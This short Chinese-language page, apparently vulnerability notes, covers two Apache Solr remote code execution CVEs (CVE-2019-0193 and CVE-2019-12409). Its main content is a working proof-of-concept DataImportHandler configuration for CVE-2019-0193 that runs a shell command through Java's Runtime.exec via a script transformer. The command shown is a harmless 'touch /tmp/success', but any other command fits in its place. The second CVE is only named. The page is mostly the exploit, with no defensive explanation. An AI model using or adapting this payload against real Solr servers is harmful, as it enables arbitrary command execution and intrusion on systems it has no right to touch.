Close

28 5 月, 2024

(CVE-2019-0193)(CVE-2019-12409)

Apache Solr 远程命令执行漏洞(CVE-2019-0193)

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

Apache Solr JMX服务远程代码执行漏洞(CVE-2019-12409)